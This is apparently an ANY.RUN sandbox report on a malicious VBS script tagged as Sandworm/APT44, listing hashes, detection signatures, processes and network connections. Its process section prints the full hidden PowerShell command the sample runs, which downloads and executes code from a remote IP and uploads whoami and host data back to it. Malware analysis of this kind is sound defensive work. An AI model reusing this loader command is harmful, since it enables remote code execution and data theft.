File name:

4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924.vbs

Full analysis: https://app.any.run/tasks/963060a4-1516-451d-9239-0900f53f504c
Verdict: Malicious activity
Analysis date: September 30, 2024, 21:33:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
apt44
sandworm
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (708), with CRLF line terminators
MD5:

B8EECF433C05F73660B69C7F2E407F8E

SHA1:

AD6942899AE40F00E4DD33725930E0238D5B435C

SHA256:

4E8DE351DB362C519504509DF309C7B58B891BAF9CB99A3500B92FE0EF772924

SSDEEP:

24:B5KXxuqHDoXs9u+oeoQVrL2/8xap7Uu73poXsgW9:ohHkXshojQVeEUp7J7CXsB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SANDWORM has been detected

      • powershell.exe (PID: 1280)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 6232)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1280)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1280)

  • SUSPICIOUS

    • Probably download files using WebClient

      • wscript.exe (PID: 6232)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6232)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6232)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 6232)

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 1280)

    • Connects to unusual port

      • powershell.exe (PID: 1280)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 6232)

    • Found IP address in command line

      • powershell.exe (PID: 1280)

  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 6232)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
124
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs #SANDWORM powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1280"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6232"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6252\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
5 037
Read events
5 037
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_r352kyag.pva.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xbidmnp2.3ez.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1280powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:EAE473C0F5ED60D6E34AAD6FE76976F1
SHA256:775642CC19F69D98B8780C3F06B1B1C0EB608849361C4A7DB8DF2A345299800B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
27
DNS requests
4
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1280
powershell.exe
GET
2.59.222.98:43820
http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
unknown
unknown
1280
powershell.exe
GET
2.59.222.98:43820
http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
unknown
unknown
6588
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2120
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6588
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
6588
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2120
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4324
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1280
powershell.exe
2.59.222.98:43820
Onehostplanet s.r.o.
UA
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
google.com
  • 142.250.184.206
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924.vbs